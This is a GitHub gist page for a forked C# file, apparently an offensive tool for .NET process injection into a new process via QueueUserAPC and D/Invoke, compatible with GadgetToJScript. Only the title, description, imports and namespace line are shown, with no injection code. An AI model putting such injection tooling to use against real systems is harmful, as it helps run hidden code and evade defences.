Skip to content

Instantly share code, notes, and snippets.

View shassaan's full-sized avatar
⚒️
Hacking

Syed Hassaan Ahmed shassaan

⚒️
Hacking
View GitHub Profile
@shassaan
shassaan / DInjectQueuerAPC.cs
Created February 14, 2021 07:48 — forked from sunnyneo/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace DinjectorWithQUserAPC
{
public class Program